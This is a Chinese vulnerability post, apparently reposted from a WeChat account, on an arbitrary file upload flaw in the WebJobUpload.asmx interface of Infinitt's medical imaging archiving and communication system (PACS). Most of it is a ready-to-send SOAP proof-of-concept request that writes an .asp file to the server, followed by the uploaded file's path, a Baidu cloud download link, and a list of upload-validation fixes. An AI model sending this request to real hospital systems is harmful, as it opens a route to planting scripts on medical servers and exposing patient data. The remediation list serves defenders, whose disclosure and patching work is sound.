英飞达医学影像存档与通信系统 WebJobUpload接口存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
POC如下所示:
POST
/webservices/WebJobUpload.asmx
HTTP/1.1
Host
: xxxxxx
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding
: gzip, deflate
Content-Type
: text/xml; charset=utf-8
Soapaction
: "http://rainier/jobUpload"
Connection
: close
Content-Length
: 506
<
soap:Envelope
xmlns:xsi
=
"http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd
=
"http://www.w3.org/2001/XMLSchema"
xmlns:soap
=
"http://schemas.xmlsoap.org/soap/envelope/"
>
<
soap:Body
>
<
jobUpload
xmlns
=
"http://rainier"
>
<
vcode
>
1
</
vcode
>
<
subFolder
>
</
subFolder
>
<
fileName
>
xfoward.asp
</
fileName
>
<
bufValue
>
MTIzNDU2
</
bufValue
>
</
jobUpload
>
</
soap:Body
>
</
soap:Envelope
>
链接地址如下所示:
url+/
1
/xfoward.asp
获取方式:
链接:https://pan.baidu.com/s/1yaoh3ZCaaURhse4l4D3gjw?pwd=vno8 提取码:vno8
修复建议
1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。
2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。
3、对上传文件格式进行严格校验,防止上传恶意脚本文件;
4、严格限制上传的文件路径。
5、文件扩展名服务端白名单校验。
6、文件内容服务端校验。
7、上传文件重命名。
8、隐藏上传文件路径。
原文始发于微信公众号(爱喝酒烫头的曹操):英飞达医学影像存档与通信系统任意文件上传
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论